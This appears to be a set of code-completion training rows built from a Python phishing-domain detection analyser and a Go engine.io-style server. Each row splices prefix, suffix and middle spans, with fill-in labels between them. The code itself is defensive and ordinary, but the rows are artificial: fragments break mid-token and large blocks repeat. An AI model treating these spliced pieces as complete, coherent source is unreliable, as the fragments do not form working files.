class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analys | record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
}) | conditional_block |
common_domain_analyser.py | name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
| '''
Generate features to detect outliers in the stream. In our case, the outliers is
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = [] | identifier_body |
|
common_domain_analyser.py | domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class | (Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analys | DomainMatchingOption | identifier_name |
common_domain_analyser.py | ers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
| def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
''' | random_line_split |
|
server.go | ReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
| s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r * | glog.Errorf("could not encode open payload: %v", err)
return
}
if | conditional_block |
server.go | upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
